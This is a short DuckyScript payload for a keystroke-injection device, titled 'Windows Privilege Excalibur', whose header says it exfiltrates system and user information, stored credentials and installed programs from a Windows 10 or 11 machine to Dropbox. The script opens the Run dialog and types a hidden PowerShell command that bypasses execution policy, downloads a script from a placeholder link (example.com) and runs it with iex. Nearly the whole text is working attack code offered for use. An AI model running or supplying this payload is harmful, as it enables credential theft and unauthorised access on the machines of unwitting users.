REM     Title: Windows Privilege Excalibur
REM     Author: Who-Is-Julien
REM     Description: This payload exfiltrates Windows system information, user information, stored credentials and installed programs from the target computer to Dropbox for subsequent privilege escalation analysis.
REM     Target: Windows 10, 11

REM     Replace DOWNLOAD_LINK with the actual download link of the script.
DEFINE DOWNLOAD_LINK example.com


DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr 
STRING DOWNLOAD_LINK
STRING ; iex $pl
DELAY 500
ENTER
